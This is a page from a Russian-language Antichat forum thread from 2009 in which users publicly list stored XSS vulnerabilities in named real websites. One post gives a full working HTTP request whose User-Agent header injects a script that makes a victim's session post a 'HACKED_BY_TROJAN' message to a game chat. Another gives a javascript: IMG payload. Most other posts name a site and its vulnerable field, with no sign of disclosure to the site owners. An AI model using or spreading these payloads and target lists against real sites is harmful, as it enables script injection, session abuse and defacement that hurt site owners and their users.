HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 33 из 54 « Первая < 23 29 30 31 32 33 34 35 36 37 43 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 27.01.2009, 20:48
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
С нами: 10061036

Репутация: 127
По умолчанию
Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!

Пример использования:

Код:
POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО

player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1
Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим

Код:
ЛОГИН: HACKED_BY_TROJAN_
P.S. На момент публикации всё работает!

27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")

TROJAN (с)
 
Ответить с цитированием

  #322  
Старый 11.02.2009, 22:02
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
И вновь i.ua

Сервис "Объявления" - board.i.ua
При заполнении формы уязвимо поле "Название товара"

Цитата:
http://board.i.ua/user/1435442/
 
Ответить с цитированием

  #323  
Старый 13.02.2009, 07:17
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
С нами: 9808570

Репутация: 22
По умолчанию
активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
регистрируемся на форуме
уязвимо поле ИМЯ
 
Ответить с цитированием

  #324  
Старый 18.02.2009, 14:33
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
A.UA
В письме уязвимо поле "Тема".
 
Ответить с цитированием

Xss на http://jetswap.com/
  #325  
Старый 19.03.2009, 14:10
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
С нами: 9151094

Репутация: 10
Post Xss на http://jetswap.com/
PHP код:
http://go.jetswap.com/support 
Уязвимое поле тема.
Минус только один в течении примерно 10 часов служба поддержки обрабатывает ваш запрос и удаляет его.
З.Ы. У админов и службы поддержки скрипт не обрабатывается.
 
Ответить с цитированием

  #326  
Старый 20.03.2009, 18:07
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
http://autoportal.od.ua/?a=forum&p=1
Уязвивмы все поля.
 
Ответить с цитированием

  #327  
Старый 24.03.2009, 17:05
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
С нами: 9151094

Репутация: 10
По умолчанию
PHP код:
demotivation.ru
Уязвимо поле коментария 
<IMG SRC="javascript:alert('XSS');"
http://demotivation.ru/0ixq1u1biut9pic.html
Пример
 
Ответить с цитированием

  #328  
Старый 24.03.2009, 18:28
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
http://voiska.ru
PHP код:
уязвимое поле :название новости
http://voiska.ru/index.php?ind=news&op=news_show_category&idc=2 
 
Ответить с цитированием

  #329  
Старый 25.03.2009, 13:10
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
www.tiensmed.ru
Код:
уязвимое: название новости
http://www.tiensmed.ru/news/upcoming/
 
Ответить с цитированием

  #330  
Старый 26.03.2009, 14:12
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
http://www.chef.com.ua
Код:
уязвимое поле:коментарии
http://www.chef.com.ua/articles/588.html#comments
 
Ответить с цитированием
Ответ
Страница 33 из 54 « Первая < 23 29 30 31 32 33 34 35 36 37 43 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.